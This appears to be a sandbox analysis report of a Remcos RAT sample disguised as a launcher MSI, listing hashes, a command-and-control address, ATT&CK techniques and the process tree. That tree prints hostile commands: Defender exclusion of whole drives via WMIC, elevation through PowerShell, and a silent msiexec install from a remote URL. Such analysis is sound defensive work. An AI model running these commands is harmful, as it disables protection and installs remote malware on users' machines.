remcos | 2bf994daf30eb46bfbf9f43028717c14e4693a7afb4a5c2bb7b6d852daed2b86

Resubmissions

16-10-2024 08:03

241016-jxqefszhpg 10

16-10-2024 07:59

241016-jvwtfszgrg 10

Analysis

max time kernel
61s
max time network
64s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-10-2024 07:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Predict7.6.3/Launcher8.3.6.msi
Size

34.8MB
MD5

62a70b6a607c787a26ecd7aae7f5cfa7
SHA1

24be3506a7eb8bcddd63810813934138902a07d1
SHA256

975bcef0f45e9012fd3d1e06133d916eec9a77bfe40bf4d526711a40ff956dfb
SHA512

d18514bae872ce947a05551485d377a3d8de1f807aa9c486496cdef455f09f71b16967b62a24e95d5c62217d63c63939337f66023815b35a0fbd9e87b2c6a18a
SSDEEP

786432:Fx7ZJrqPhKmBwZDjzQrdj1CqeqaGK3Eafgtil2EJGw0SEx:7rqt6zKdj3auMgtTyGw0

Score

10^/10

remcos newinch discovery execution persistence privilege_escalation rat

Malware Config

Extracted

Family

remcos

Botnet

NEWINCH

185.157.162.103:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Gameprot-LPTFIG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
4232	msiexec.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
29	3128	msiexec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	cscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
856	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1460 set thread context of 3672	1460	rvm.exe	143
PID 4028 set thread context of 744	4028	rvm.exe	142

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\sev\dev\Firefox Installer.exe	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\utorrent_installer.exe	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\task.vbs	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\utorrent_installer.exe	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\ChromeSetup.exe	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\npp.8.4.2.Installer.x64.exe	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\lola.bat	msiexec.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e57a27a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA345.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA559.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA731.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF001.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEF74.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF14A.tmp	msiexec.exe
File created	C:\Windows\Tasks\patchDemo.job	cmd.exe
File created	C:\Windows\Installer\e57a27a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA606.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{E45CD3AA-D057-4CDA-8041-B83DEADDEEF8}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA8C8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEE78.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA655.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE445.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEED6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Tasks\UKM_app.job	cmd.exe

Executes dropped EXE 4 IoCs

pid	Process
3860	rvm.exe
3608	rvm.exe
4028	rvm.exe
1460	rvm.exe

Loads dropped DLL 25 IoCs

pid	Process
3708	MsiExec.exe
3708	MsiExec.exe
3708	MsiExec.exe
3708	MsiExec.exe
3708	MsiExec.exe
5096	MsiExec.exe
5096	MsiExec.exe
5096	MsiExec.exe
5096	MsiExec.exe
3608	rvm.exe
3608	rvm.exe
3860	rvm.exe
3608	rvm.exe
3860	rvm.exe
3860	rvm.exe
3608	rvm.exe
3860	rvm.exe
4028	rvm.exe
4028	rvm.exe
4028	rvm.exe
4028	rvm.exe
1460	rvm.exe
1460	rvm.exe
1460	rvm.exe
1460	rvm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
1116	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rvm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rvm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rvm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rvm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
388	timeout.exe
5100	timeout.exe
4484	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4332	taskkill.exe
4000	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4512	msiexec.exe
4512	msiexec.exe
856	powershell.exe
856	powershell.exe
856	powershell.exe
3128	msiexec.exe
3128	msiexec.exe
4028	rvm.exe
1460	rvm.exe
1460	rvm.exe
744	cmd.exe
3672	cmd.exe
3672	cmd.exe
744	cmd.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1460	rvm.exe
4028	rvm.exe
3672	cmd.exe
744	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1116	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1116	msiexec.exe
Token: SeSecurityPrivilege	4512	msiexec.exe
Token: SeCreateTokenPrivilege	1116	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1116	msiexec.exe
Token: SeLockMemoryPrivilege	1116	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1116	msiexec.exe
Token: SeMachineAccountPrivilege	1116	msiexec.exe
Token: SeTcbPrivilege	1116	msiexec.exe
Token: SeSecurityPrivilege	1116	msiexec.exe
Token: SeTakeOwnershipPrivilege	1116	msiexec.exe
Token: SeLoadDriverPrivilege	1116	msiexec.exe
Token: SeSystemProfilePrivilege	1116	msiexec.exe
Token: SeSystemtimePrivilege	1116	msiexec.exe
Token: SeProfSingleProcessPrivilege	1116	msiexec.exe
Token: SeIncBasePriorityPrivilege	1116	msiexec.exe
Token: SeCreatePagefilePrivilege	1116	msiexec.exe
Token: SeCreatePermanentPrivilege	1116	msiexec.exe
Token: SeBackupPrivilege	1116	msiexec.exe
Token: SeRestorePrivilege	1116	msiexec.exe
Token: SeShutdownPrivilege	1116	msiexec.exe
Token: SeDebugPrivilege	1116	msiexec.exe
Token: SeAuditPrivilege	1116	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1116	msiexec.exe
Token: SeChangeNotifyPrivilege	1116	msiexec.exe
Token: SeRemoteShutdownPrivilege	1116	msiexec.exe
Token: SeUndockPrivilege	1116	msiexec.exe
Token: SeSyncAgentPrivilege	1116	msiexec.exe
Token: SeEnableDelegationPrivilege	1116	msiexec.exe
Token: SeManageVolumePrivilege	1116	msiexec.exe
Token: SeImpersonatePrivilege	1116	msiexec.exe
Token: SeCreateGlobalPrivilege	1116	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeRestorePrivilege	4512	msiexec.exe
Token: SeTakeOwnershipPrivilege	4512	msiexec.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeIncreaseQuotaPrivilege	1412	WMIC.exe
Token: SeSecurityPrivilege	1412	WMIC.exe
Token: SeTakeOwnershipPrivilege	1412	WMIC.exe
Token: SeLoadDriverPrivilege	1412	WMIC.exe
Token: SeSystemProfilePrivilege	1412	WMIC.exe
Token: SeSystemtimePrivilege	1412	WMIC.exe
Token: SeProfSingleProcessPrivilege	1412	WMIC.exe
Token: SeIncBasePriorityPrivilege	1412	WMIC.exe
Token: SeCreatePagefilePrivilege	1412	WMIC.exe
Token: SeBackupPrivilege	1412	WMIC.exe
Token: SeRestorePrivilege	1412	WMIC.exe
Token: SeShutdownPrivilege	1412	WMIC.exe
Token: SeDebugPrivilege	1412	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1116	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4512 wrote to memory of 3708	4512	msiexec.exe	87
PID 4512 wrote to memory of 3708	4512	msiexec.exe	87
PID 4512 wrote to memory of 3708	4512	msiexec.exe	87
PID 4512 wrote to memory of 4224	4512	msiexec.exe	90
PID 4512 wrote to memory of 4224	4512	msiexec.exe	90
PID 4224 wrote to memory of 388	4224	cmd.exe	92
PID 4224 wrote to memory of 388	4224	cmd.exe	92
PID 4224 wrote to memory of 5100	4224	cmd.exe	95
PID 4224 wrote to memory of 5100	4224	cmd.exe	95
PID 4224 wrote to memory of 4484	4224	cmd.exe	98
PID 4224 wrote to memory of 4484	4224	cmd.exe	98
PID 4224 wrote to memory of 1516	4224	cmd.exe	101
PID 4224 wrote to memory of 1516	4224	cmd.exe	101
PID 1516 wrote to memory of 856	1516	cscript.exe	102
PID 1516 wrote to memory of 856	1516	cscript.exe	102
PID 856 wrote to memory of 4480	856	powershell.exe	104
PID 856 wrote to memory of 4480	856	powershell.exe	104
PID 4480 wrote to memory of 940	4480	wscript.exe	105
PID 4480 wrote to memory of 940	4480	wscript.exe	105
PID 940 wrote to memory of 1412	940	cmd.exe	107
PID 940 wrote to memory of 1412	940	cmd.exe	107
PID 4480 wrote to memory of 2468	4480	wscript.exe	110
PID 4480 wrote to memory of 2468	4480	wscript.exe	110
PID 2468 wrote to memory of 2264	2468	cmd.exe	112
PID 2468 wrote to memory of 2264	2468	cmd.exe	112
PID 4480 wrote to memory of 1092	4480	wscript.exe	113
PID 4480 wrote to memory of 1092	4480	wscript.exe	113
PID 1092 wrote to memory of 484	1092	cmd.exe	116
PID 1092 wrote to memory of 484	1092	cmd.exe	116
PID 4480 wrote to memory of 2576	4480	wscript.exe	118
PID 4480 wrote to memory of 2576	4480	wscript.exe	118
PID 2576 wrote to memory of 4572	2576	cmd.exe	121
PID 2576 wrote to memory of 4572	2576	cmd.exe	121
PID 4480 wrote to memory of 5012	4480	wscript.exe	122
PID 4480 wrote to memory of 5012	4480	wscript.exe	122
PID 5012 wrote to memory of 4332	5012	cmd.exe	124
PID 5012 wrote to memory of 4332	5012	cmd.exe	124
PID 4480 wrote to memory of 3488	4480	wscript.exe	125
PID 4480 wrote to memory of 3488	4480	wscript.exe	125
PID 3488 wrote to memory of 4000	3488	cmd.exe	127
PID 3488 wrote to memory of 4000	3488	cmd.exe	127
PID 4480 wrote to memory of 4060	4480	wscript.exe	128
PID 4480 wrote to memory of 4060	4480	wscript.exe	128
PID 4480 wrote to memory of 1216	4480	wscript.exe	130
PID 4480 wrote to memory of 1216	4480	wscript.exe	130
PID 1216 wrote to memory of 4232	1216	wscript.exe	133
PID 1216 wrote to memory of 4232	1216	wscript.exe	133
PID 3128 wrote to memory of 5096	3128	msiexec.exe	137
PID 3128 wrote to memory of 5096	3128	msiexec.exe	137
PID 3128 wrote to memory of 5096	3128	msiexec.exe	137
PID 3128 wrote to memory of 3860	3128	msiexec.exe	138
PID 3128 wrote to memory of 3860	3128	msiexec.exe	138
PID 3128 wrote to memory of 3860	3128	msiexec.exe	138
PID 3128 wrote to memory of 3608	3128	msiexec.exe	139
PID 3128 wrote to memory of 3608	3128	msiexec.exe	139
PID 3128 wrote to memory of 3608	3128	msiexec.exe	139
PID 3860 wrote to memory of 4028	3860	rvm.exe	140
PID 3860 wrote to memory of 4028	3860	rvm.exe	140
PID 3860 wrote to memory of 4028	3860	rvm.exe	140
PID 3608 wrote to memory of 1460	3608	rvm.exe	141
PID 3608 wrote to memory of 1460	3608	rvm.exe	141
PID 3608 wrote to memory of 1460	3608	rvm.exe	141
PID 4028 wrote to memory of 744	4028	rvm.exe	142
PID 4028 wrote to memory of 744	4028	rvm.exe	142

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Predict7.6.3\Launcher8.3.6.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1116

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6731EDF394C6BD11EC15E61A8FB46DE9
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\sev\dev\updt\lola.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:388
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5100
- - C:\Windows\system32\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4484
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process wscript.exe -ArgumentList '""C:\Program Files (x86)\sev\dev\updt\task.vbs""' -Verb runAs"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:856
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\task.vbs
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4480
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:940
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1412
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2468
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"
        7⤵
        
        PID:2264
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1092
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"
        7⤵
        
        PID:484
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2576
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"
        7⤵
        
        PID:4572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im cmd.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im cmd.exe
        7⤵
        Kills process with taskkill
        
        PID:4332
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im msiexec.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3488
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im msiexec.exe
        7⤵
        Kills process with taskkill
        
        PID:4000
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c echo Script started >> "C:\Users\root\Desktop\wix\log.txt"
        6⤵
        
        PID:4060
      - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs"
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1216
        
        C:\Windows\System32\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i https://mydrivesa.s3.us-east-2.amazonaws.com/gemi.msi /qn
        7⤵
        Use of msiexec (install) with remote resource
        
        PID:4232

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 11E7005581C916FAA8789D83866A618C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5096
- C:\Users\Admin\AppData\Local\All\ez\ez\rvm.exe
  "C:\Users\Admin\AppData\Local\All\ez\ez\rvm.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3860
- - C:\Users\Admin\AppData\Local\tlsjava1\rvm.exe
    C:\Users\Admin\AppData\Local\tlsjava1\rvm.exe
    3⤵
    - Suspicious use of SetThreadContext
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:4028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:744
    - - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1680
- C:\Users\Admin\AppData\Local\All\ez\Package\rvm.exe
  "C:\Users\Admin\AppData\Local\All\ez\Package\rvm.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Users\Admin\AppData\Local\Checknode_test4\rvm.exe
    C:\Users\Admin\AppData\Local\Checknode_test4\rvm.exe
    3⤵
    - Suspicious use of SetThreadContext
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:1460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:3672
    - - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4548

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57a27d.rbs

Filesize
2KB

MD5
fffd939a78f3503c2d8e3f3ee9b29ef0

SHA1
40f3ec215a7c14a6b30133607e92b749790df500

SHA256
bd935bfce5c010d2015bfecfa7149e2b18225fe1127c745b31a2c92c8a6ccea4

SHA512
2912fe7043eab73affedbb18dc7854c0ed514da005335c9b264fc73d0eeb815ce3550465b7a5abf1b0225c73dec64b31064a5e58d09b3b4a31551c424c5d25f0

Download Submit
C:\Config.Msi\e57f08c.rbs

Filesize
3KB

MD5
39fb82c9d484fb2a0ab4b48132414c48

SHA1
b6789f6df0e7c2b355b29f715a625b3e7adcfe50

SHA256
bb5268c94619183348411d4ff9c35af1cf4f54f049098ffdf93b1d932a94c965

SHA512
800e99a75b297583da8475d67b79d387cbd52d810130141127efd2363a9012cf5927c85ffdd0b0b6afa84e4cc8829f0da8b48d55185ec2526bf4c394ec339365

Download Submit
C:\Program Files (x86)\sev\dev\updt\lola.bat

Filesize
812B

MD5
362a7e5642b76b23fb80b308ca7db6ae

SHA1
23008c45967ba93537852283fa24f241460e7078

SHA256
4c09166857e5eee427084beab9efffa309971d658fad55ccff3153b4afa73ffc

SHA512
42ae69ad4059cf65b4c56a53773c568d785acabe8fef112242c22347e6b9d820160f7bfd044fdf2dc725ff3c7ce11f8a6ad494cbcb18693093d1da36927d8fa7

Download Submit
C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs

Filesize
659B

MD5
94d85f8f350a1f6fe8e700b87f5b4eea

SHA1
0dc9e11c55b3e056eeadb9cfe6ef2b6bd98300ea

SHA256
